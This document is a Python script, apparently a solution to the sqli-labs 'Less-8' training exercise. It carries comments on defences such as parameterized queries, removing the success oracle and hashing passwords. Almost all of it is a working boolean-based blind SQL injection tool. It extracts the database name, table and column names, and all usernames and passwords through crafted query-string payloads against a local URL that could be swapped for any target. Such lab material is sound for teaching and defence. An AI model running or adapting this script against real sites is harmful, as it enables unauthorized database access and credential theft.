import requests
import string
# Walkthrough of the local sqli-labs "Less-8" exercise (boolean-based blind
# injection). The page prints the fixed string 'You are in...........' only
# when the injected condition is true, so every request below leaks exactly
# one bit, and the rest of the script is a linear search driven by that oracle.
#
# Defensive reading: the payload shape (?id=1'and ... --+) shows the lab
# concatenating the `id` parameter into SQL. A parameterized query removes the
# injection; not echoing a fixed "success" banner removes the oracle; and the
# probe pattern (hundreds of sequential requests carrying length(...),
# substr(...) and information_schema in the query string from one client) is an
# easy log/WAF signature.
#
# NOTE: the pasted source had lost its indentation; the block structure below
# is reconstructed from the control flow.
url='http://127.0.0.1/sqli/Less-8/'
i=0
db_name_len=0
print('[+]正在猜解数据库长度......')
# Stage 1: length of the current database name. Tests length(database())=i
# for i = 0, 1, 2, ... and stops at the first hit; gives up after 30 attempts
# (prints 'error!') so the loop cannot run forever.
while True:
    payload=url+"?id=1'and length(database())=%d--+"%i
    res=requests.get(payload)
    #print(payload)
    if 'You are in...........' in res.text:
        db_name_len=i
        print ('数据库长度为:'+str(db_name_len))
        break
    if i==30:
        print('error!')
        break
    i+=1
print("[+]正在猜解数据库名字......")
# Stage 2: recover the database name one position at a time. For position i,
# try each lowercase letter k until substr(database(),i,1)='k' makes the
# oracle string appear, then move on. Only a-z is tried, so a position holding
# a digit or '_' is simply skipped (nothing is appended, no error is raised).
db_name=''
for i in range(1,db_name_len+1):
    #print(i)
    for k in string.ascii_lowercase:
        #print(k)
        payload=url+"?id=1'and substr(database(),%d,1)='%s'--+"%(i,k)
        res=requests.get(payload)
        #print(payload)
        if 'You are in...........' in res.text:
            db_name+=k
            #print(db_name)
            break
print("数据库为: %s"%db_name)
#guess how many tables there are
print("[+]正在猜解表的数量......")
# Stage 3: count the tables in the `security` schema by testing
# count(table_name)=tab_num for tab_num = 0, 1, 2, ... The schema name is
# hard-coded here (and in the table/column probes below) instead of using the
# db_name recovered in stage 2. Unlike the length probe, this loop has no
# upper bound: it only ends when the oracle finally matches.
tab_num=0
while True:
    payload=url+"?id=1'and (select count(table_name) from information_schema.tables where table_schema='security')=%d--+"%tab_num
    res=requests.get(payload)
    if 'You are in...........' in res.text:
        print("%s数据库共有"%db_name+str(tab_num)+"张表")
        break
    else:
        tab_num+=1
print("[+]开始猜解表名......")
# Stage 4: for each table (selected with `limit i-1,1` from information_schema)
# recover its name length, then its name, then enumerate its columns with the
# same three steps (count -> per-column length -> per-column name).
for i in range(1,tab_num+1):
    # 4a: length of the i-th table name, capped at 30 attempts.
    tab_len=0
    while True:
        payload=url+"?id=1'and (select length(table_name) from information_schema.tables where table_schema='security' limit %d,1)=%d--+"%(i-1,tab_len)
        res=requests.get(payload)
        #print(payload)
        if 'You are in...........' in res.text:
            #print ('table %d name length: '%i+str(tab_len))
            break
        if tab_len==30:
            print('error!')
            break
        tab_len+=1
    # 4b: the table name, one lowercase letter per position. There is no
    # `break` after a match, so the remaining letters are still probed for
    # each position (extra requests; the result is unchanged unless more than
    # one letter satisfies the equality for that position).
    tab_name=''
    for j in range(1,tab_len+1):
        for m in string.ascii_lowercase:
            payload=url+"?id=1'and substr((select table_name from information_schema.tables where table_schema='security' limit %d,1),%d,1)='%s'--+"%(i-1,j,m)
            res=requests.get(payload)
            if 'You are in...........' in res.text:
                tab_name+=m
                #print (tab_name)
    print("[-]第%d张表名为: %s"%(i,tab_name))
    #try to guess the columns under this table......
    # 4c: column count for this table. Unbounded loop; note the filter is on
    # table_name only (no table_schema clause, unlike the table probes above).
    dump_num=0
    while True:
        payload=url+"?id=1'and (select count(column_name) from information_schema.columns where table_name='%s')=%d--+"%(tab_name,dump_num)
        res=requests.get(payload)
        if 'You are in...........' in res.text:
            print("%s表下有%d个字段"%(tab_name,dump_num))
            break
        dump_num+=1
    for a in range(1,dump_num+1):
        # Column name length. Here the counter is incremented before the ==30
        # cap is checked (the table-length loop above checks first), so this
        # loop makes one more attempt than that one before printing 'error!!'.
        dump_len=0
        while True:
            payload=url+"?id=1'and (select length(column_name) from information_schema.columns where table_name='%s' limit %d,1)=%d--+"%(tab_name,a-1,dump_len)
            res=requests.get(payload)
            #print(payload)
            if 'You are in...........' in res.text:
                #print("column %d length is %d"%(a,dump_len))
                break
            dump_len+=1
            if dump_len==30:
                print("error!!")
                break
        # Column name; alphabet widened to a-z plus '_' and '-'. The inner
        # loop reuses `i` as the position index: the outer `for i` is rebound
        # from its range iterator on the next table and nothing after this
        # loop reads `i` in the current iteration, so the shadowing is harmless.
        dump_name=''
        for i in range(1,dump_len+1):
            for j in (string.ascii_lowercase+'_-'):
                payload=url+"?id=1'and substr((select column_name from information_schema.columns where table_name='%s' limit %d,1),%d,1)='%s'--+"%(tab_name,a-1,i,j)
                res=requests.get(payload)
                if 'You are in...........' in res.text:
                    dump_name+=j
                    #print(dump_name)
                    break
        print(dump_name)
print("[+]开始猜解users表下的username......")
# Stage 5: dump every username in security.users with the same three-step
# pattern (row count, per-row length, per-row characters). The alphabet now
# covers upper case, digits, '_' and '-', and the oracle check is the shorter
# prefix "You are in" rather than the dotted string used in earlier stages.
# Neither the count loop nor the length loop has an upper bound.
usn_num=0
char="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890_-"
while True:
    payload=url+"?id=1'and (select count(username) from security.users)=%d--+"%usn_num
    res=requests.get(payload)
    if "You are in" in res.text:
        #print(usn_num)#13
        break
    usn_num+=1
for i in range(1,usn_num+1):
    usn_len=0
    while True:
        payload=url+"?id=1'and (select length(username) from security.users limit %d,1)=%d--+"%(i-1,usn_len)
        res=requests.get(payload)
        if "You are in" in res.text:
            #print("row %d length is %d"%(i,usn_len))
            break
        usn_len+=1
    usr_name=''
    for k in range(1,usn_len+1):
        for m in char:
            payload=url+"?id=1'and substr((select username from security.users limit %d,1),%d,1)='%s'--+"%(i-1,k,m)
            res = requests.get(payload)
            if "You are in" in res.text:
                usr_name+=m
                break
    print(usr_name)
print("[+]开始猜解users表下的password......")
# Stage 6: same procedure as stage 5 against the password column. The
# variables usn_num / usn_len / usr_name are reused as-is, and the alphabet
# gains '@' and '!'. Whatever the column holds is recovered one character per
# hit -- which is why credentials belong in a salted hash, not a reversible
# or plaintext field, even when the query itself is fixed.
usn_num=0
char="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890_-@!"
while True:
    payload=url+"?id=1'and (select count(password) from security.users)=%d--+"%usn_num
    res=requests.get(payload)
    if "You are in" in res.text:
        #print(usn_num)#13
        break
    usn_num+=1
for i in range(1,usn_num+1):
    usn_len=0
    while True:
        payload=url+"?id=1'and (select length(password) from security.users limit %d,1)=%d--+"%(i-1,usn_len)
        res=requests.get(payload)
        if "You are in" in res.text:
            #print("row %d length is %d"%(i,usn_len))
            break
        usn_len+=1
    usr_name=''
    for k in range(1,usn_len+1):
        for m in char:
            payload=url+"?id=1'and substr((select password from security.users limit %d,1),%d,1)='%s'--+"%(i-1,k,m)
            res = requests.get(payload)
            if "You are in" in res.text:
                usr_name+=m
                break
    print(usr_name)